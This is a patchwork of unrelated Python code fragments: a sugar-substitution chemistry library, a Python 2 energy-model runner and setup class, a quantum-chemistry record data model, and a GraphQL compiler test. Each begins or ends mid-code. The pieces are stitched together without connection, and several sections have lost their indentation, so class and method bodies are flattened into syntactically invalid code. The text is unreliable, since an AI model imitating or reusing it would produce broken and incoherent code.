        #   modifs[0][i] = isomery mark of carbon i+1 ("" = none)
        #   modifs[1][i] = substitution id of carbon i+1 (-1 = bound/unavailable)
        for icarb in range(self.nct):
            iso.append("")
            if icarb==self.ncc-1:
                mods.append(-1)
            else:
                mods.append(SubstitutionLibrary.NOSUBID)
        self.modifs.append(iso)
        self.modifs.append(mods)
        self.anhydro=False
    def setname(self,name):
        """Set the display name of the ose."""
        self.name=name
    def in_cycle(self,cnum):
        """
        Return True if carbon number ``cnum`` belongs to the ring.
        """
        return cnum in range(self.startcycle,self.ncc+self.startcycle)
    def bind_carb(self,cnum):
        """
        Mark carbon ``cnum`` as engaged in a bond (-1 = unavailable).
        """
        self.modifs[1][cnum-1]=-1
    def unbind_carb(self,cnum):
        """
        Free carbon ``cnum`` again (back to the 'no substitution' id).
        """
        self.modifs[1][cnum-1]=SubstitutionLibrary.NOSUBID
    def set_modcarb(self,cnum,subid):
        """
        Attach substitution ``subid`` to carbon ``cnum``.
        """
        self.modifs[1][cnum-1]=subid
    def get_modcarb(self,cnum):
        """
        Return the substitution id attached to carbon ``cnum``.
        """
        return self.modifs[1][cnum-1]
    def get_carbmod(self,idsub):
        """Return the carbon numbers carrying substitution ``idsub``."""
        carbs=[]
        for icarb in range(len(self.modifs[1])):
            if self.modifs[1][icarb]==idsub:
                carbs.append(icarb+1)
        return carbs
    def set_isocarb(self,cnum,iso):
        """
        Set the isomery mark ("D"/"L"/"") of carbon ``cnum``.
        """
        self.modifs[0][cnum-1]=iso
    def get_isocarb(self,cnum):
        """Return the isomery mark of carbon ``cnum``."""
        return self.modifs[0][cnum-1]
    def rm_carbs(self,carbs):
        """
        Remove the given carbon slots from the substitution table.

        NOTE(review): only modifs[1] is popped (the isomery list in modifs[0]
        keeps its length) and ``cnum`` is used as a 0-based index here, unlike
        the 1-based accessors above -- confirm this is intended.
        """
        for cnum in carbs:
            self.modifs[1].pop(cnum)
    def add_carbs(self,nbcarbs,mods=None):
        """
        Append ``nbcarbs`` carbon slots, optionally initialised from ``mods``
        (a sequence of (isomery mark, substitution id) pairs).
        """
        for icarb in range(nbcarbs):
            if mods:
                self.modifs[0].append(mods[icarb][0])
                self.modifs[1].append(mods[icarb][1])
            else:
                self.modifs[0].append("")
                self.modifs[1].append(SubstitutionLibrary.NOSUBID)
    def set_anhydrobond(self,bind):
        """
        bind: boolean for now (text like 3,6 can be later)
        """
        self.anhydro=bind
    def get_endc(self):
        """Return the number of the last ring carbon."""
        return self.ncc+self.startcycle-1
    def striso(self):
        """Return the isomery marks of every carbon as a string ("-" = none)."""
        iso=""
        for isocarb in self.modifs[0]:
            if isocarb in ["D","L"]:
                iso+=isocarb
            else:
                iso+="-"
        return iso
    def get_epimer(self):
        """Return the isomery string restricted to the chiral carbons."""
        isotxt=""
        endc=self.startcycle+self.ncc-1
        # not chiral
        if self.nct==self.ncc:
            endc-=1
        # neuraminic acid as abnormal example ....
        if self.nct>6:
            endc=self.nct-1
        for cnum in range(self.startcycle+1,endc):
            iso=self.modifs[0][cnum-1]
            if iso in ["D","L"] :
                isotxt+=iso
            else:
                isotxt+="-"
        return isotxt
class Substitution:
    """
    A substituent that can replace an OH on an ose carbon: formula, SMILES,
    linking atom and the derived mass delta.
    """
    UKN=0
    """
    naming of unreferenced substitution
    """
    PATFORM="[A-Z][a-z]?[0-9]{1,2}"  # one "<Atom><count>" token of a formula
    CID=0
    """
    numbering of substitution instances (as unique identifier)
    """
    def __init__(self,formula,link=None,name=None,smiles=None):
        """
        :param formula: atomic formula, e.g. "O2H1"
        :param link: atom through which the substituent attaches; derived
            from ``smiles`` or ``formula`` when None
        :param name: display name; auto-generated ("uknN") when None
        :param smiles: SMILES string of the substituent
        """
        if name==None:
            self.name="ukn"+str(Substitution.UKN)
            Substitution.UKN+=1
        else:
            self.name=name
        self.identifier=None
        self.formula=formula
        self.smiles=smiles
        self.link=""
        if link==None:
            # Derive the linking atom: first atom of the SMILES, else "O" if
            # the formula contains oxygen, else the first non-H atom of the
            # formula.
            if smiles!=None:
                self.link=re.match("^=?[A-Z][a-z]?",smiles).group()
            elif re.search("O",formula):
                self.link="O"
            else:
                self.link=re.match("^=?[A-Z][a-z]?",re.sub("H[0-9]+","",formula)).group()
        else:
            self.link=link
    # linkage is on an ose carbon: mass delta relative to the replaced OH
    def get_delta(self):
        """
        Mass of the formula minus the mass of the replaced OH (and 1H if linkage is on ose C)
        :return: the round difference of Dalton mass between OH and elements in the substitution
        :rtype: float
        """
        # NOTE(review): assumes self.smiles is a string; a substitution built
        # with smiles=None would raise here -- confirm callers always set it.
        delta=self.massSubstitution()
        o=Atom.mass("O")
        h=Atom.mass("H")
        delta=delta-o-h
        if re.match("^=",self.smiles):
            delta-=h
        linkage=self.smiles
        # Each parenthesised branch replaces one more H on the carbon.
        while re.match("^\(",linkage):
            delta-=h
            if re.match("^\(=",self.smiles):
                delta-=h
            linkage=linkage[linkage.find(")")+1:]
        #if re.match("^=",self.link):
            #delta-=h
        ### linkage on carbon, not replacing the oxygen
        ## !!!! not suitable for substit=desoxy, special case where link==""
        ## ok if 2 atoms are bound to the ose carbon
        #if self.link=="" and self.formula!="H1":
            ## remove an H from the carbon, add the substituent formula mass minus OH
            #delta-=h
        return round(delta,3)
    def equals(self,compar):
        """
        Return True if ``compar`` equals this formula once this formula is
        normalised to a sorted concatenation of "<Atom><count>" tokens.
        (``compar`` is assumed to be already normalised -- TODO confirm.)
        """
        formula_ref=sorted(re.findall("[A-Z][a-z]?[0-9]+",self.formula))
        txtref=""
        for a in formula_ref:
            txtref+=a
        return compar==txtref
    def massSubstitution(self):
        """Return the Dalton mass of this substitution's formula."""
        return Substitution.__compute_mass__(self.formula)
    def __compute_mass__(formula):
        """
        Sum the atomic masses over the "<Atom><count>" tokens of ``formula``.
        """
        m=0
        f=re.findall(Substitution.PATFORM,formula)
        for ab in f:
            #m+=SubstitutionLibrary.massAtom(re.sub("[0-9]","",ab))*int(re.sub("[a-zA-Z]","",ab))
            m+=Atom.mass(re.sub("[0-9]","",ab))*int(re.sub("[a-zA-Z]","",ab))
        return m
class SubstitutionLibrary:
"""
"""
SUBSTITUTIONS=[]
"""
store the list of substitutions
"""
NOSUBID=0
"""
store the identifier of no substitution (OH on carbon)
"""
    def __init__(self):
        """
        Seed the class-level catalog with the built-in substitutions.
        (Instantiating the library registers them; the catalog itself lives
        on the class.)
        """
        # arguments: name, formula, linkage, smiles=None
        SubstitutionLibrary.create_substit("oxydation","O2H1","","(=O)O")
        #SubstitutionLibrary.create_substit("keto","C1O2H4","","(CO)O")
        SubstitutionLibrary.create_substit("desoxy","H1","","")
        SubstitutionLibrary.create_substit("double_bond","O1",None,"=O")
        SubstitutionLibrary.create_substit("ferulic_acid","C10H9O4","O","OC(=O)C=CC1=CC=C(O)C(OC)=C1")
def sort_by_name():
"""
Sort the list of substitutions according to their name
"""
SubstitutionLibrary.SUBSTITUTIONS=sorted(SubstitutionLibrary.SUBSTITUTIONS,key=lambda s:s.name)
@staticmethod
def get_data():
"""
"""
data=[]
for s in SubstitutionLibrary.SUBSTITUTIONS:
data.append({"identifier":s.identifier,"name":s.name,"formula":s.formula,"link":s.link,"smiles":s.smiles,"mass":s.massSubstitution()})
return data
def to_json():
non=["oxydation","keto","desoxy","double_bond","ferulic_acid"]
data={}
for s in SubstitutionLibrary.SUBSTITUTIONS:
if s.name not in non:
data[s.name]={"formula":s.formula,"smiles": s.smiles}
return json.dumps(data)
def create_substit(name,formula,link,smiles=None):
"""
:return: a new substitution if formula not found in internal ressource
"""
query= SubstitutionLibrary.get_subformul(formula)
if not query:
substit=Substitution(formula,link,name,smiles)
SubstitutionLibrary.add_substit(substit)
return substit
elif link!=query.link:
substit=Substitution(formula,link,name,smiles)
SubstitutionLibrary.add_substit(substit)
return substit
else:
return query
def add_substit(substit):
"""
add the substitution object to the internal catalog
"""
SubstitutionLibrary.SUBSTITUTIONS.append(substit)
Substitution.CID+=1
substit.identifier=Substitution.CID
    @staticmethod
    def get_subname(identifier):
        """
        :param identifier: identification number
        :type: int
        :return: the substituent name according to the identifier, or "" if
            no substitution carries that identifier
        :rtype: string
        """
        s=SubstitutionLibrary.getSub(identifier)
        if s:
            return s.name
        Logger.debug("identifier not found: %i"%identifier,1)
        return ""
def get_subfromname(name):
"""
:rtype: Substitution
"""
for s in SubstitutionLibrary.SUBSTITUTIONS:
if s.name.lower()==name.lower():
return s
return None
    @staticmethod
    def get_subformul(formula):
        """
        Return the first substitution whose formula matches ``formula`` when
        both are compared as sorted character sequences, or None.

        NOTE(review): character-level sorting would also equate e.g. "C12"
        and "C21" -- confirm formulas are normalised upstream.
        """
        for s in SubstitutionLibrary.SUBSTITUTIONS:
            if sorted(s.formula)==sorted(formula):
                return s
        return None
    def mod_id(**kwargs):
        """
        Update name/formula/smiles/linkage of every substitution whose
        identifier equals ``kwargs["identifier"]`` (compared as int).
        """
        for modsub in SubstitutionLibrary.SUBSTITUTIONS:
            if modsub.identifier==int(kwargs["identifier"]):
                modsub.name=kwargs["name"]
                modsub.formula=kwargs["formula"]
                modsub.smiles=kwargs["smiles"]
                modsub.link=kwargs["linkage"]
def rm_id(identifier):
"""
"""
matchsub=None
for substit in SubstitutionLibrary.SUBSTITUTIONS:
if substit.identifier==identifier:
matchsub=substit
if matchsub:
SubstitutionLibrary.SUBSTITUTIONS.remove(matchsub)
def check_smiles(identifier):
"""
"""
substit=SubstitutionLibrary.getSub(identifier)
if substit!=None:
smiles=substit.smiles
compo=substit.formula
if smiles=="" and compo!="H1":
return False
if smiles=="O" and compo not in ["O1H1","H1O1"]:
return False
if smiles=="=":
| |
directory = os.path.join(self.model_root, 'results' + tag)
try:
os.makedirs(os.path.join(directory))
except OSError:
pass
results = {}
picklename = os.path.join(directory,'binary_results.pkl')
with open(picklename, 'rb') as pkl:
while True:
try:
temp = pickle.load(pkl)
key = temp[0]
i = 0
while key in results.keys():
key = key.split(' #')[0] + ' #' + str(i)
i += 1
results[key] = temp[1]
except:
break
return results
    def run (self, community_config, global_config = None,
                tag = '', scalers = None, alt_save_name = None):
        """
        run the model for a community

        inputs:
            community_config: path to the community config file <string>
            global_config: (optional) path to a global config file <string>
            tag: (optional) tag for results dir <string>
            scalers: (optional) scaler values; defaults to default_scalers
            alt_save_name: (optional) alternate name used when saving results
        outputs:
            component results, input files and diagnostics are saved, and
            the combined results are stored via store_results
        preconditions:
            see invariants
        postconditions:
            None
        """
        #~ print community_config
        if scalers is None:
            scalers = default_scalers
        #~ if name is None:
            #~ name = community
        # leftover of the commented-out img_dir logic below; ``temp`` is unused
        temp = tag
        #~ if img_dir is None:
            #~ if temp != '':
                #~ temp = '_' + tag
            #~ img_dir = os.path.join(self.model_root, 'results' + temp, 'plots')
        #~ cd, fc, diag = self.setup_community(community, i_dir, c_config,
            #~ g_config, c_mult, scalers)
        diagnostics = Diagnostics()
        community_data = CommunityData(
            community_config,
            global_config,
            diagnostics,
            scalers
        )
        name = community_data.get_item('community', 'file id')
        #~ print name
        forecast = Forecast(community_data, diagnostics, scalers)
        comps_used = self.run_components(
            community_data,
            forecast,
            diagnostics,
            scalers
        )
        #~ name = community_data.get_item('community', 'file id')
        self.save_components_output(comps_used, name, forecast, tag,
            alt_name=alt_save_name)
        #~ self.save_forecast_output(forecast, name, img_dir, plot, tag)
        self.save_input_files(community_data, name, tag, alt_name=alt_save_name)
        self.save_diagnostics(diagnostics, name, tag, alt_name=alt_save_name)
        comps_used['community data'] = community_data
        comps_used['forecast'] = forecast
        #~ print name
        #~ print 'rb', alt_save_name
        self.store_results(comps_used, tag, name=alt_save_name)
    def run_many (self, directory):
        """
        run every community config found in a directory with default options,
        logging (not raising) configuration errors per community

        inputs:
            directory: path containing community .yaml/.yml configs <string>
        """
        communities = \
            [f for f in os.listdir( directory ) \
                if f.endswith('.yaml') or f.endswith('.yml')]
        for c in communities:
            try:
                self.run(os.path.join(directory,c))
            except (RuntimeError, IOError) as e:
                print '------------------------'
                print e
                msg = "RUN ERROR: "+ c + \
                        " not a configured community/project"
                print msg
                print '------------------------'
    def run_script(self):
        """
        TODO move code to run a script from cli (placeholder; currently a
        no-op)
        """
        pass
def save_metadata (self, tag = ""):
"""
save model metadata
inputs:
tag: (optional) tag for results dir <string>
outputs:
saves version_metadata.txt
preconditions:
see invariants
postconditions:
None
"""
if tag != '':
tag = '_' + tag
directory = os.path.join(self.model_root, 'results' + tag)
try:
os.makedirs(os.path.join(directory))
except OSError:
pass
with open(os.path.join(directory, "version_metadata.txt"), 'w') as fd:
ts = datetime.strftime(datetime.now(), "%Y-%m-%d")
fd.write(("Code Version: " + __version__ + "\n"
"Code URL: " + __download_url__ + "\n"
"Date Run: " + ts + '\n' ))
    def save_summaries (self, tag = ''):
        """
        save the summaries for the communities in a results directory's
        binary results file

        inputs:
            tag: (optional) tag for results dir <string>
        outputs:
            summary files are saved
        preconditions:
            see invariants
        postconditions:
            None
        """
        res = self.load_results(tag)
        #~ print res
        if tag != '':
            tag = '_' + tag
        directory = os.path.join(self.model_root, 'results' + tag)
        try:
            os.makedirs(os.path.join(directory))
        except OSError:
            pass
        summaries.village_log(res,directory)
        summaries.building_log(res,directory)
        summaries.fuel_oil_log(res,directory)
        summaries.forecast_comparison_log(res,directory)
        summaries.electric_price_summary(res,directory)
        summaries.call_comp_summaries(res,directory)
class Setup (object):
    """
    setup the structure needed to run the model

    class invariants:
        self.model_root: is the model root path <string>
        self.communities: list of communities to setup <string>
        self.data_dir: path to the data repo <string>
        self.tag: tag used as the directory to setup the model in
            model_root <string>
        self.diagnostics: Diagnostics object shared by all preprocessing
    """
    def __init__ (self, model_root, data_dir, communities = None, tag = None):
        """
        initializer

        inputs:
            model_root: model root path <string>
            data_dir: path to data repo <string>
            communities: (optional) list of communities to setup <list>
            tag: (optional) tag to use as self.tag setup sub directory,
                if not provided self.tag will be m<version>_d<version> <string>
        postconditions:
            see invariants
        """
        self.model_root = model_root
        self.communities = communities
        self.data_dir = data_dir
        self.tag = tag
        if tag is None:
            self.tag = self.make_version_tag()
        self.diagnostics = Diagnostics()
    def make_version_tag (self):
        """
        generate a version tag ("m<code version>_d<data version>")

        precondition:
            see invariants
            'VERSION' file must exist in repo
        outputs
            returns tag
        """
        data_version_file = os.path.join(self.data_dir, 'VERSION')
        with open(data_version_file, 'r') as fd:
            ver = fd.read().replace("\n", "")
        ver = 'm' + __version__ + '_d' + ver
        return ver
    def setup_directories (self):
        """
        setup the directories

        preconditions:
            see invariants
        postconditions:
            config and input_files are removed and then
            config and input_files directories are created.
        """
        setup_path = os.path.join(self.model_root, self.tag)
        try:
            shutil.rmtree(os.path.join(setup_path, "config"))
        except OSError:
            pass  # nothing to remove on a fresh setup
        os.makedirs(os.path.join(setup_path, "config"))
    def setup_community_list (self):
        """
        create the community list file from the repo

        preconditions:
            see invariants, community_list.csv should exist in data repo
        postcondition:
            '__community_list.csv' saved in config directory
        """
        config_path = os.path.join(self.model_root, self.tag, 'config',
            '__community_list.csv')
        src_path = os.path.join(self.data_dir, 'community_list.csv')
        shutil.copy(src_path, config_path)
    def write_preprocessor_metadata (self, save_path):
        """
        write data metadata

        inputs:
            save_path: directory in which to create the "__metadata"
                subdirectory <string>
        outputs:
            saves 'preprocessor_metadata.yaml', the diagnostics log and a
            zip of the raw data in a "__metadata" subdirectory
        """
        data_version_file = os.path.join(self.data_dir, 'VERSION')
        with open(data_version_file, 'r') as fd:
            ver = fd.read().replace("\n", "")
        md_dir = os.path.join(save_path, "__metadata")
        try:
            os.makedirs(md_dir)
        except OSError:
            pass
        #~ try:
            #~ os.makedirs(os.path.join(md_dir,'diagnostic_files'))
        #~ except OSError:
            #~ pass
        m = 'w'
        with open(
                os.path.join(md_dir, 'preprocessor_metadata.yaml'),
                m) as meta:
            # NOTE(review): 'upadted' is a typo, but it is the key actually
            # written to the yaml file; renaming it would change the output.
            meta.write(yaml.dump({'upadted': datetime.strftime(datetime.now(),
                                        "%Y-%m-%d %H:%M:%S"),
                                  'data version': ver},
                                  default_flow_style = False))
        self.diagnostics.save_messages(os.path.join(md_dir, 'log.csv'))
        # re-read the data version (duplicates the read above)
        data_version_file = os.path.join(self.data_dir, 'VERSION')
        with open(data_version_file, 'r') as fd:
            ver = fd.read().replace("\n", "")
        z = zipfile.ZipFile(os.path.join(md_dir, "raw_data.zip"),"w")
        for raw in [f for f in os.listdir(self.data_dir) if '.csv' in f]:
            z.write(os.path.join(self.data_dir,raw), raw)
        z.write(os.path.join(data_version_file), 'VERSION')
    def load_communities (self):
        """Load self.communities from the '__community_list.csv' config."""
        data = read_csv(os.path.join(self.model_root, self.tag, 'config',
            '__community_list.csv'))
        self.communities = [c for c in data['Community'].values]
    def setup (self, force = False, ng_coms = [], make_globals = False):
        """
        run the setup functionality

        inputs:
            force: (optional) overwrite existing files <boolean>
            ng_coms: (optional) communities to preprocess as natural gas
                communities <list>
            make_globals: (optional) split shared keys out into a global
                config file <boolean>
        outputs:
            model structure is setup; returns False when the setup path
            already exists and force is False, True otherwise
        """
        # NOTE(review): mutable default ng_coms=[] is shared across calls;
        # harmless here since it is only read, never mutated.
        setup_path = os.path.join(self.model_root, self.tag)
        if os.path.exists(setup_path) and force == False:
            return False
        self.setup_directories()
        self.setup_community_list()
        if self.communities is None:
            self.load_communities()
        f_path = os.path.join(self.model_root, self.tag, 'config')
        for community in self.communities:
            #~ print community
            #~ f_path = os.path.join(self.model_root, self.tag, 'config')
            preprocessor = Preprocessor(community,
                                    self.data_dir,
                                    diag = self.diagnostics,
                                    process_intertie = False)
            self.diagnostics.add_note('Preprocessing ' + community, '---------')
            if community in ng_coms:
                preprocessor.run(show=True, ng_com=True)
            else:
                preprocessor.run(show=True)
            if make_globals:
                keys_to_split = KEYS_FOR_GLOBAL
                preprocessor.save_config(f_path, keys_to_split)
                f_name = os.path.join(f_path, '__global_config.yaml')
                if not os.path.exists(f_name):
                    preprocessor.save_global_congfig(f_name, keys_to_split)
            else:
                preprocessor.save_config(f_path)
            ## the intertie, if it exists
            try:
                preprocessor = Preprocessor(community,
                                    self.data_dir,
                                    diag = self.diagnostics,
                                    process_intertie = True)
                self.diagnostics.add_note('Preprocessing ' + community,
                    '---------')
                preprocessor.run(show=True)
                if make_globals:
                    keys_to_split = KEYS_FOR_GLOBAL
                    preprocessor.save_config(f_path, keys_to_split)
                else:
                    preprocessor.save_config(f_path)
            except PreprocessorError:
                pass  # community is not part of an intertie
        #~ self.setup_global_config()
        #~ ids = self.setup_input_files()
        #~ self.setup_community_configs()
        #~ self.setup_construction_multipliers()
        #~ self.setup_goals()
        self.write_preprocessor_metadata(f_path)
        return True
def script_validator (script_file):
"""
validate a script(very basic), will raise a standard error if a problem
is found
inputs:
script file: a script file
outputs:
retuns a validated script to use to run the model
"""
extns = ['yaml','yml']
with open(script_file, 'r') as sf:
script = yaml.load(sf)
try:
root = script['global']['root']
except KeyError:
raise StandardError, "No root provided for model structure"
try:
gcfg = script['global']['global config']
if not os.path.isfile(gcfg) and \
not os.path.split(gcfg)[1].split('.')[1] in extns:
raise StandardError, "golbal config not a yaml file"
except KeyError:
script['global']['global config'] = None
if script['global']['global config'] is None:
gc = os.path.join(root, 'config', '__global_config.yaml')
if os.path.isfile(gc):
script['global']['global config'] = gc
try:
res_tag = script['global']['results tag']
except KeyError:
script['global']['results tag'] = ''
res_tag = ''
errors = []
all_coms = set()
for com in script['communities']:
community = com['community'].replace(' ','_')
try:
com['ID']
except KeyError:
com['ID'] = None
if com['ID'] is None:
com['ID'] = com['community']
| |
import abc
import copy
import datetime
import json
from enum import Enum
from typing import Any, Dict, Optional, Set
import qcelemental as qcel
from pydantic import Field, validator
from qcelemental.models.results import AtomicResultProtocols
from ..outputstore import OutputStore
from ..records.models import RecordStatusEnum
# from ...interface.models import ObjectId, ProtoModel
ObjectId = int
from qcelemental.models import ProtoModel
class DriverEnum(str, Enum):
    """
    The type of calculation that is being performed (e.g., energy, gradient, Hessian, ...).
    """
    # The str mixin makes members compare and serialize as their plain string
    # values, which keeps JSON round-trips and pydantic validation simple.
    energy = "energy"
    gradient = "gradient"
    hessian = "hessian"
    properties = "properties"
class QCSpecification(ProtoModel):
    """
    The quantum chemistry metadata specification for individual computations such as energy, gradient, and Hessians.
    """
    driver: DriverEnum = Field(..., description=str(DriverEnum.__doc__))
    method: str = Field(..., description="The quantum chemistry method to evaluate (e.g., B3LYP, PBE, ...).")
    basis: Optional[str] = Field(
        None,
        description="The quantum chemistry basis set to evaluate (e.g., 6-31g, cc-pVDZ, ...). Can be ``None`` for "
        "methods without basis sets.",
    )
    keywords: Optional[ObjectId] = Field(
        None,
        description="The Id of the :class:`KeywordSet` registered in the database to run this calculation with. This "
        "Id must exist in the database.",
    )
    protocols: Optional[AtomicResultProtocols] = Field(
        AtomicResultProtocols(), description=str(AtomicResultProtocols.__base_doc__)
    )
    program: str = Field(
        ...,
        description="The quantum chemistry program to evaluate the computation with. Not all quantum chemistry programs"
        " support all combinations of driver/method/basis.",
    )
    def dict(self, *args, **kwargs):
        """Serialize to a dict, omitting an empty ``protocols`` entry.

        Dropping the empty dict keeps the serialized form — and any hash
        computed from it — identical to records created before the
        ``protocols`` field existed.
        """
        ret = super().dict(*args, **kwargs)
        # Maintain hash compatibility (see docstring).
        # NOTE(review): assumes "protocols" is present in the output — confirm
        # callers never exclude it via dict()/json() kwargs.
        if len(ret["protocols"]) == 0:
            ret.pop("protocols", None)
        return ret
    @validator("basis")
    def _check_basis(cls, v):
        # Normalize the basis-set name.
        # NOTE(review): `prepare_basis` is not in this module's visible import
        # block — confirm it is defined or imported elsewhere in the file.
        return prepare_basis(v)
    @validator("program")
    def _check_program(cls, v):
        # Program names are matched case-insensitively; store lowercase.
        return v.lower()
    @validator("method")
    def _check_method(cls, v):
        # Method names are matched case-insensitively; store lowercase.
        return v.lower()
class Record(abc.ABC):
_type = "record"
_SpecModel = QCSpecification
    class _DataModel(ProtoModel):
        """Pydantic model holding every persisted field of a Record.

        Instances are created by ``Record.__init__`` from keyword arguments;
        the outer ``Record`` exposes selected fields through properties.
        """
        # Classdata
        # NOTE: do we want to change how these work?
        _hash_indices: Set[str]
        # Base identification
        id: ObjectId = Field(
            None, description="Id of the object on the database. This is assigned automatically by the database."
        )
        hash_index: Optional[str] = Field(
            None, description="Hash of this object used to detect duplication and collisions in the database."
        )
        procedure: str = Field(..., description="Name of the procedure which this Record targets.")
        program: str = Field(
            ...,
            description="The quantum chemistry program used for individual quantum chemistry calculations.",
        )
        version: int = Field(..., description="The version of this record object.")
        protocols: Optional[Dict[str, Any]] = Field(
            None, description="Protocols that change the data stored in top level fields."
        )
        # Extra fields
        extras: Dict[str, Any] = Field({}, description="Extra information to associate with this record.")
        # Outputs: each of stdout/stderr/error is stored either as an id
        # referencing the database (fetched lazily) or inlined as a full
        # OutputStore object in the matching *_obj field.
        stdout: Optional[ObjectId] = Field(
            None,
            description="The Id of the stdout data stored in the database which was used to generate this record from the "
            "various programs which were called in the process.",
        )
        stdout_obj: Optional[OutputStore] = Field(
            None,
            description="The full stdout data stored in the database which was used to generate this record from the "
            "various programs which were called in the process.",
        )
        stderr: Optional[ObjectId] = Field(
            None,
            description="The Id of the stderr data stored in the database which was used to generate this record from the "
            "various programs which were called in the process.",
        )
        stderr_obj: Optional[OutputStore] = Field(
            None,
            description="The full stderr data stored in the database which was used to generate this record from the "
            "various programs which were called in the process.",
        )
        error: Optional[ObjectId] = Field(
            None,
            description="The Id of the error data stored in the database in the event that an error was generated in the "
            "process of carrying out the process this record targets. If no errors were raised, this field "
            "will be empty.",
        )
        error_obj: Optional[OutputStore] = Field(
            None,
            description="The full error output stored in the database which was used to generate this record from the "
            "various programs which were called in the process.",
        )
        # Compute status
        manager_name: Optional[str] = Field(None, description="Name of the Queue Manager which generated this record.")
        status: RecordStatusEnum = Field(..., description=str(RecordStatusEnum.__doc__))
        modified_on: datetime.datetime = Field(
            None, description="Last time the data this record points to was modified."
        )
        created_on: datetime.datetime = Field(
            None, description="Time the data this record points to was first created."
        )
        # Carry-ons
        provenance: Optional[qcel.models.Provenance] = Field(
            None,
            description="Provenance information tied to the creation of this record. This includes things such as every "
            "program which was involved in generating the data for this record.",
        )
    def __init__(self, client: Optional["PortalClient"] = None, **kwargs: Any):
        """
        Parameters
        ----------
        client : PortalClient, optional
            A PortalClient connected to a server.
        **kwargs : Dict[str, Any]
            Additional keywords passed to the Record and the initial data constructor.
        """
        # The client is kept for lazy server lookups (e.g. _outputstore_get);
        # it may be None for records that are never fetched from a server.
        self._client = client
        # Create the data model; pydantic validates all persisted fields here.
        self._data = self._DataModel(**kwargs)
def __repr__(self):
fields = [f"{key}={value}" for key, value in self.__repr_args__()]
return f"{self.__class__.__name__}({', '.join(fields)})"
def __repr_args__(self):
return [("id", f"{self.id}"), ("status", f"{self.status}")]
@classmethod
def from_dict(cls, data: Dict[str, Any], client: Optional["PortalClient"] = None) -> "Record":
"""Creates a new Record instance from a dict representation.
Allows roundtrips from `Collection.to_dict`.
Parameters
----------
data : Dict[str, Any]
A dict to create a new Record instance from.
client : PortalClient, optional
A PortalClient connected to a server.
Returns
-------
Record
A Record instance.
"""
class_name = cls.__name__.lower()
# Check we are building the correct object
record_type = cls._type
if "procedure" not in data:
raise KeyError("Attempted to create Record from data, but no `procedure` field found.")
if data["procedure"].lower() != record_type:
raise KeyError(
"Attempted to create Record from data with class {}, but found record type of {}.".format(
class_name, data["procedure"].lower()
)
)
# Allow PyDantic to handle type validation
ret = cls(client=client, **data)
return ret
@classmethod
def from_json(
cls, *, jsondata: Optional[str] = None, filename: Optional[str] = None, client: Optional["PortalClient"] = None
) -> "Record":
"""Creates a new Record instance from a JSON string.
Allows roundtrips from `Record.to_json`.
One of `jsondata` or `filename` must be provided.
Parameters
----------
jsondata : str, Optional, Default: None
The JSON string to create a new Record instance from.
filename : str, Optional, Default: None
The filename to read JSON data from.
client : PortalClient, optional
A PortalClient connected to a server.
Returns
-------
Record
A Record instance.
"""
if (jsondata is not None) and (filename is not None):
raise ValueError("One of `jsondata` or `filename` must be specified, not both")
if jsondata is not None:
data = json.loads(jsondata)
elif filename is not None:
with open(filename, "r") as jsonfile:
data = json.load(jsonfile)
else:
raise ValueError("One of `jsondata` or `filename` must be specified")
return cls.from_dict(data, client=client)
    def to_dict(self) -> dict:
        """Returns a copy of the current Record data as a Python dict.

        Returns
        -------
        ret : dict
            A Python dict representation of the Record data.
        """
        # Deep-copy so callers cannot mutate the underlying data model's
        # nested containers through the returned dict.
        datadict = self._data.dict()
        return copy.deepcopy(datadict)
    # alias for to_dict, for duck-typing parity with pydantic
    dict = to_dict
    def to_json(self, filename: Optional[str] = None) -> str:
        """Returns the current Record data as JSON.

        If a filename is provided, dumps JSON to file.
        Otherwise returns data as a JSON string.

        Parameters
        ----------
        filename : str, Optional, Default: None
            The filename to write JSON data to.

        Returns
        -------
        ret : str or None
            If `filename=None`, a JSON string representation of the Record.
            Otherwise `None`.
        """
        jsondata = self._data.json()
        if filename is not None:
            with open(filename, "w") as open_file:
                open_file.write(jsondata)
        else:
            return jsondata
    # alias for to_json, for duck-typing parity with pydantic
    json = to_json
@property
def status(self):
"""Status of the calculation corresponding to this record."""
return self._data.status.value if self._data.status else None
    @property
    def id(self):
        """Database id of this record (``None`` until assigned by the database)."""
        return self._data.id
@property
def spec(self):
"""Includes keywords."""
# example
# TODO: need to change `_DataModel` above to accommodate usage like this
self._SpecModel(**self._data.spec)
    @property
    def task(self):
        """Placeholder for the record's task; not yet implemented (returns ``None``)."""
        # will need to handle case of task key being present or not
        pass
def _outputstore_get(self, field_name):
oid = self._data.__dict__[field_name]
if oid is None:
return None
print("{} : '{}' || {}".format(self.__class__.__name__, self.id, self._client.address))
result = self._client._get_outputs(oid)
if field_name == "error":
return result.as_json
else:
return result.as_string
@property
def stdout(self):
"""The STDOUT contents for this record, if it exists."""
if self._data.stdout_obj is not None:
return self._data.stdout_obj
else:
return self._outputstore_get("stdout")
@property
def stderr(self):
"""The STDERR contents for this record, if it exists."""
return self._outputstore_get("stderr")
@property
def error(self):
"""The error traceback contents for this record, if it exists."""
return | |
expressions.OutputContextField(
child_location.navigate_to_field('name'), GraphQLString),
}),
]
expected_location_types = {
base_location: 'Animal',
child_location: 'Animal',
}
check_test_data(self, test_data, expected_blocks, expected_location_types)
    def test_has_edge_degree_op_filter_with_optional(self):
        """A has_edge_degree filter combined with an @optional traversal of the same edge."""
        test_data = test_input_data.has_edge_degree_op_filter_with_optional()
        base_location = helpers.Location(('Species',))
        animal_location = base_location.navigate_to_subpath('in_Animal_OfSpecies')
        child_location = animal_location.navigate_to_subpath('out_Animal_ParentOf')
        revisited_animal_location = animal_location.revisit()
        expected_blocks = [
            blocks.QueryRoot({'Species'}),
            blocks.MarkLocation(base_location),
            blocks.Traverse('in', 'Animal_OfSpecies'),
            blocks.Filter(
                expressions.BinaryComposition(
                    u'||',
                    expressions.BinaryComposition(  # the zero-edge check
                        u'&&',
                        expressions.BinaryComposition(
                            u'=',
                            expressions.Variable('$child_count', GraphQLInt),
                            expressions.ZeroLiteral
                        ),
                        expressions.BinaryComposition(
                            u'=',
                            expressions.LocalField('out_Animal_ParentOf'),
                            expressions.NullLiteral
                        )
                    ),
                    expressions.BinaryComposition(  # the non-zero-edge check
                        u'&&',
                        expressions.BinaryComposition(
                            u'!=',
                            expressions.LocalField('out_Animal_ParentOf'),
                            expressions.NullLiteral
                        ),
                        expressions.BinaryComposition(
                            u'=',
                            expressions.UnaryTransformation(
                                u'size',
                                expressions.LocalField('out_Animal_ParentOf')
                            ),
                            expressions.Variable('$child_count', GraphQLInt),
                        )
                    )
                )
            ),
            blocks.MarkLocation(animal_location),
